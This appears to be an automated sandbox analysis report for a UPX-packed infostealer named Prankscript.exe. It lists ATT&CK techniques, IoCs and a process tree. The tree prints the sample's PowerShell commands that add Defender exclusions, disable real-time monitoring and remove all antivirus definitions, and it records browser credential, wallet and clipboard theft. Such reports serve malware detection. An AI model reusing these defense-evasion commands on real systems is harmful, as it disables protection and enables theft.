bb74eeb349b280b04f90e7437f77eb53cfe209d7e4093c3ad093fc0be9817b3b

Resubmissions

30-10-2024 17:46

241030-wcdalsxlhs 10

30-10-2024 17:05

241030-vl959swqgs 10

Analysis

max time kernel
147s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-10-2024 17:05

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Prankscript.exe
Size

69.0MB
MD5

2e5ec8b0a8af16b1d042367a86981938
SHA1

ecbacf37eefdf1154aef164b81b4242c96f13777
SHA256

bb74eeb349b280b04f90e7437f77eb53cfe209d7e4093c3ad093fc0be9817b3b
SHA512

fdacab5917ec8d3796f7382ca19fb932eb4f40ea07614229a7bfc57cfeacbb24c930b2857a59ccfb0a790e74cf465b009cefaf06fb17f9a250380871dc3f679f
SSDEEP

196608:bWfQecp8urErvI9pWjgN3ZdahF0pbH1AYfTRtQPCsZp/AA81s:Pp8urEUWjqeWxRR6zppas

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3524	powershell.exe
1732	powershell.exe
3508	powershell.exe
708	powershell.exe
4784	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	bound.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	wscript.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3836	cmd.exe
4376	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
4340	bound.exe
1292	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe
1128	Prankscript.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
29	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2712	tasklist.exe
1588	tasklist.exe
3212	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2204	cmd.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c73-22.dat	upx
behavioral2/memory/1128-26-0x00007FF918670000-0x00007FF918D34000-memory.dmp	upx
behavioral2/files/0x0007000000023c65-28.dat	upx
behavioral2/files/0x0007000000023c71-32.dat	upx
behavioral2/memory/1128-50-0x00007FF92FEC0000-0x00007FF92FECF000-memory.dmp	upx
behavioral2/files/0x0007000000023c6c-49.dat	upx
behavioral2/files/0x0007000000023c6b-48.dat	upx
behavioral2/files/0x0007000000023c6a-47.dat	upx
behavioral2/files/0x0007000000023c69-46.dat	upx
behavioral2/files/0x0007000000023c68-45.dat	upx
behavioral2/files/0x0007000000023c67-44.dat	upx
behavioral2/files/0x0007000000023c66-43.dat	upx
behavioral2/files/0x0007000000023c64-42.dat	upx
behavioral2/files/0x0007000000023c78-41.dat	upx
behavioral2/files/0x0007000000023c77-40.dat	upx
behavioral2/files/0x0007000000023c76-39.dat	upx
behavioral2/files/0x0007000000023c72-36.dat	upx
behavioral2/files/0x0007000000023c70-35.dat	upx
behavioral2/memory/1128-31-0x00007FF9283E0000-0x00007FF928405000-memory.dmp	upx
behavioral2/memory/1128-59-0x00007FF927D00000-0x00007FF927D1A000-memory.dmp	upx
behavioral2/memory/1128-60-0x00007FF927450000-0x00007FF927474000-memory.dmp	upx
behavioral2/memory/1128-56-0x00007FF927D20000-0x00007FF927D4D000-memory.dmp	upx
behavioral2/memory/1128-62-0x00007FF918150000-0x00007FF9182CF000-memory.dmp	upx
behavioral2/memory/1128-66-0x00007FF92B9C0000-0x00007FF92B9CD000-memory.dmp	upx
behavioral2/memory/1128-65-0x00007FF9220D0000-0x00007FF9220E9000-memory.dmp	upx
behavioral2/memory/1128-68-0x00007FF921690000-0x00007FF9216C3000-memory.dmp	upx
behavioral2/memory/1128-75-0x00007FF917530000-0x00007FF917A59000-memory.dmp	upx
behavioral2/memory/1128-76-0x00007FF9283E0000-0x00007FF928405000-memory.dmp	upx
behavioral2/memory/1128-80-0x00007FF929D80000-0x00007FF929D8D000-memory.dmp	upx
behavioral2/memory/1128-79-0x00007FF9220B0000-0x00007FF9220C4000-memory.dmp	upx
behavioral2/memory/1128-73-0x00007FF917A60000-0x00007FF917B2D000-memory.dmp	upx
behavioral2/memory/1128-72-0x00007FF918670000-0x00007FF918D34000-memory.dmp	upx
behavioral2/memory/1128-84-0x00007FF9183A0000-0x00007FF9184BB000-memory.dmp	upx
behavioral2/memory/1128-83-0x00007FF927450000-0x00007FF927474000-memory.dmp	upx
behavioral2/memory/1128-220-0x00007FF918150000-0x00007FF9182CF000-memory.dmp	upx
behavioral2/memory/1128-319-0x00007FF921690000-0x00007FF9216C3000-memory.dmp	upx
behavioral2/memory/1128-331-0x00007FF917A60000-0x00007FF917B2D000-memory.dmp	upx
behavioral2/memory/1128-343-0x00007FF917530000-0x00007FF917A59000-memory.dmp	upx
behavioral2/memory/1128-354-0x00007FF918670000-0x00007FF918D34000-memory.dmp	upx
behavioral2/memory/1128-360-0x00007FF918150000-0x00007FF9182CF000-memory.dmp	upx
behavioral2/memory/1128-355-0x00007FF9283E0000-0x00007FF928405000-memory.dmp	upx
behavioral2/memory/1128-1352-0x00007FF927450000-0x00007FF927474000-memory.dmp	upx
behavioral2/memory/1128-1356-0x00007FF921690000-0x00007FF9216C3000-memory.dmp	upx
behavioral2/memory/1128-1357-0x00007FF917A60000-0x00007FF917B2D000-memory.dmp	upx
behavioral2/memory/1128-1361-0x00007FF9183A0000-0x00007FF9184BB000-memory.dmp	upx
behavioral2/memory/1128-1360-0x00007FF929D80000-0x00007FF929D8D000-memory.dmp	upx
behavioral2/memory/1128-1359-0x00007FF9220B0000-0x00007FF9220C4000-memory.dmp	upx
behavioral2/memory/1128-1358-0x00007FF918670000-0x00007FF918D34000-memory.dmp	upx
behavioral2/memory/1128-1355-0x00007FF92B9C0000-0x00007FF92B9CD000-memory.dmp	upx
behavioral2/memory/1128-1354-0x00007FF9220D0000-0x00007FF9220E9000-memory.dmp	upx
behavioral2/memory/1128-1353-0x00007FF918150000-0x00007FF9182CF000-memory.dmp	upx
behavioral2/memory/1128-1351-0x00007FF927D00000-0x00007FF927D1A000-memory.dmp	upx
behavioral2/memory/1128-1350-0x00007FF927D20000-0x00007FF927D4D000-memory.dmp	upx
behavioral2/memory/1128-1349-0x00007FF92FEC0000-0x00007FF92FECF000-memory.dmp	upx
behavioral2/memory/1128-1348-0x00007FF9283E0000-0x00007FF928405000-memory.dmp	upx
behavioral2/memory/1128-1347-0x00007FF917530000-0x00007FF917A59000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4176	cmd.exe
5160	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4624	cmd.exe
3372	netsh.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2516	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
808	systeminfo.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "5"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5160	PING.EXE

Suspicious behavior: EnumeratesProcesses 58 IoCs

pid	Process
708	powershell.exe
708	powershell.exe
4784	powershell.exe
4784	powershell.exe
3524	powershell.exe
3524	powershell.exe
4784	powershell.exe
4376	powershell.exe
4376	powershell.exe
708	powershell.exe
708	powershell.exe
3524	powershell.exe
3260	powershell.exe
3260	powershell.exe
4376	powershell.exe
3260	powershell.exe
1732	powershell.exe
1732	powershell.exe
1732	powershell.exe
3632	powershell.exe
3632	powershell.exe
3632	powershell.exe
3508	powershell.exe
3508	powershell.exe
3508	powershell.exe
808	powershell.exe
808	powershell.exe
808	powershell.exe
4976	msedge.exe
4976	msedge.exe
3184	msedge.exe
3184	msedge.exe
1468	identity_helper.exe
1468	identity_helper.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1588	tasklist.exe
Token: SeDebugPrivilege	708	powershell.exe
Token: SeDebugPrivilege	2712	tasklist.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	3524	powershell.exe
Token: SeIncreaseQuotaPrivilege	2944	WMIC.exe
Token: SeSecurityPrivilege	2944	WMIC.exe
Token: SeTakeOwnershipPrivilege	2944	WMIC.exe
Token: SeLoadDriverPrivilege	2944	WMIC.exe
Token: SeSystemProfilePrivilege	2944	WMIC.exe
Token: SeSystemtimePrivilege	2944	WMIC.exe
Token: SeProfSingleProcessPrivilege	2944	WMIC.exe
Token: SeIncBasePriorityPrivilege	2944	WMIC.exe
Token: SeCreatePagefilePrivilege	2944	WMIC.exe
Token: SeBackupPrivilege	2944	WMIC.exe
Token: SeRestorePrivilege	2944	WMIC.exe
Token: SeShutdownPrivilege	2944	WMIC.exe
Token: SeDebugPrivilege	2944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2944	WMIC.exe
Token: SeRemoteShutdownPrivilege	2944	WMIC.exe
Token: SeUndockPrivilege	2944	WMIC.exe
Token: SeManageVolumePrivilege	2944	WMIC.exe
Token: 33	2944	WMIC.exe
Token: 34	2944	WMIC.exe
Token: 35	2944	WMIC.exe
Token: 36	2944	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2944	WMIC.exe
Token: SeSecurityPrivilege	2944	WMIC.exe
Token: SeTakeOwnershipPrivilege	2944	WMIC.exe
Token: SeLoadDriverPrivilege	2944	WMIC.exe
Token: SeSystemProfilePrivilege	2944	WMIC.exe
Token: SeSystemtimePrivilege	2944	WMIC.exe
Token: SeProfSingleProcessPrivilege	2944	WMIC.exe
Token: SeIncBasePriorityPrivilege	2944	WMIC.exe
Token: SeCreatePagefilePrivilege	2944	WMIC.exe
Token: SeBackupPrivilege	2944	WMIC.exe
Token: SeRestorePrivilege	2944	WMIC.exe
Token: SeShutdownPrivilege	2944	WMIC.exe
Token: SeDebugPrivilege	2944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2944	WMIC.exe
Token: SeRemoteShutdownPrivilege	2944	WMIC.exe
Token: SeUndockPrivilege	2944	WMIC.exe
Token: SeManageVolumePrivilege	2944	WMIC.exe
Token: 33	2944	WMIC.exe
Token: 34	2944	WMIC.exe
Token: 35	2944	WMIC.exe
Token: 36	2944	WMIC.exe
Token: SeDebugPrivilege	4376	powershell.exe
Token: SeDebugPrivilege	3212	tasklist.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeIncreaseQuotaPrivilege	3664	WMIC.exe
Token: SeSecurityPrivilege	3664	WMIC.exe
Token: SeTakeOwnershipPrivilege	3664	WMIC.exe
Token: SeLoadDriverPrivilege	3664	WMIC.exe
Token: SeSystemProfilePrivilege	3664	WMIC.exe
Token: SeSystemtimePrivilege	3664	WMIC.exe
Token: SeProfSingleProcessPrivilege	3664	WMIC.exe
Token: SeIncBasePriorityPrivilege	3664	WMIC.exe
Token: SeCreatePagefilePrivilege	3664	WMIC.exe
Token: SeBackupPrivilege	3664	WMIC.exe
Token: SeRestorePrivilege	3664	WMIC.exe
Token: SeShutdownPrivilege	3664	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe
3180	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5224	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3480 wrote to memory of 1128	3480	Prankscript.exe	87
PID 3480 wrote to memory of 1128	3480	Prankscript.exe	87
PID 1128 wrote to memory of 1552	1128	Prankscript.exe	89
PID 1128 wrote to memory of 1552	1128	Prankscript.exe	89
PID 1128 wrote to memory of 1036	1128	Prankscript.exe	90
PID 1128 wrote to memory of 1036	1128	Prankscript.exe	90
PID 1128 wrote to memory of 1264	1128	Prankscript.exe	91
PID 1128 wrote to memory of 1264	1128	Prankscript.exe	91
PID 1128 wrote to memory of 5044	1128	Prankscript.exe	92
PID 1128 wrote to memory of 5044	1128	Prankscript.exe	92
PID 1128 wrote to memory of 2204	1128	Prankscript.exe	96
PID 1128 wrote to memory of 2204	1128	Prankscript.exe	96
PID 1264 wrote to memory of 708	1264	cmd.exe	99
PID 1264 wrote to memory of 708	1264	cmd.exe	99
PID 2204 wrote to memory of 2560	2204	cmd.exe	100
PID 2204 wrote to memory of 2560	2204	cmd.exe	100
PID 1128 wrote to memory of 60	1128	Prankscript.exe	101
PID 1128 wrote to memory of 60	1128	Prankscript.exe	101
PID 1128 wrote to memory of 1712	1128	Prankscript.exe	102
PID 1128 wrote to memory of 1712	1128	Prankscript.exe	102
PID 60 wrote to memory of 2712	60	cmd.exe	105
PID 60 wrote to memory of 2712	60	cmd.exe	105
PID 1128 wrote to memory of 4272	1128	Prankscript.exe	136
PID 1128 wrote to memory of 4272	1128	Prankscript.exe	136
PID 1712 wrote to memory of 1588	1712	cmd.exe	107
PID 1712 wrote to memory of 1588	1712	cmd.exe	107
PID 1552 wrote to memory of 4784	1552	cmd.exe	109
PID 1552 wrote to memory of 4784	1552	cmd.exe	109
PID 5044 wrote to memory of 4340	5044	cmd.exe	110
PID 5044 wrote to memory of 4340	5044	cmd.exe	110
PID 1036 wrote to memory of 3524	1036	cmd.exe	111
PID 1036 wrote to memory of 3524	1036	cmd.exe	111
PID 1128 wrote to memory of 3836	1128	Prankscript.exe	112
PID 1128 wrote to memory of 3836	1128	Prankscript.exe	112
PID 1128 wrote to memory of 2336	1128	Prankscript.exe	113
PID 1128 wrote to memory of 2336	1128	Prankscript.exe	113
PID 1128 wrote to memory of 1280	1128	Prankscript.exe	116
PID 1128 wrote to memory of 1280	1128	Prankscript.exe	116
PID 1128 wrote to memory of 4624	1128	Prankscript.exe	117
PID 1128 wrote to memory of 4624	1128	Prankscript.exe	117
PID 1128 wrote to memory of 1352	1128	Prankscript.exe	118
PID 1128 wrote to memory of 1352	1128	Prankscript.exe	118
PID 4272 wrote to memory of 2944	4272	cmd.exe	121
PID 4272 wrote to memory of 2944	4272	cmd.exe	121
PID 1128 wrote to memory of 448	1128	Prankscript.exe	122
PID 1128 wrote to memory of 448	1128	Prankscript.exe	122
PID 4340 wrote to memory of 4436	4340	bound.exe	124
PID 4340 wrote to memory of 4436	4340	bound.exe	124
PID 3836 wrote to memory of 4376	3836	cmd.exe	127
PID 3836 wrote to memory of 4376	3836	cmd.exe	127
PID 2336 wrote to memory of 3212	2336	cmd.exe	129
PID 2336 wrote to memory of 3212	2336	cmd.exe	129
PID 4624 wrote to memory of 3372	4624	cmd.exe	128
PID 4624 wrote to memory of 3372	4624	cmd.exe	128
PID 448 wrote to memory of 3260	448	cmd.exe	130
PID 448 wrote to memory of 3260	448	cmd.exe	130
PID 1280 wrote to memory of 1108	1280	cmd.exe	131
PID 1280 wrote to memory of 1108	1280	cmd.exe	131
PID 1352 wrote to memory of 808	1352	cmd.exe	132
PID 1352 wrote to memory of 808	1352	cmd.exe	132
PID 1128 wrote to memory of 3188	1128	Prankscript.exe	133
PID 1128 wrote to memory of 3188	1128	Prankscript.exe	133
PID 3188 wrote to memory of 4976	3188	cmd.exe	135
PID 3188 wrote to memory of 4976	3188	cmd.exe	135

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2560	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Prankscript.exe
"C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3480
- C:\Users\Admin\AppData\Local\Temp\Prankscript.exe
  "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Prankscript.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Prankscript.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5044
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4340
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\BEFB.tmp\BEFC.vbs //Nologo
        5⤵
        Checks computer location settings
        
        PID:4436
      - C:\Windows\System32\notepad.exe
        
        "C:\Windows\System32\notepad.exe"
        6⤵
        
        PID:4184
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=IQDWOHB_kpI
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3184
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff915f046f8,0x7ff915f04708,0x7ff915f04718
        7⤵
        
        PID:2012
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
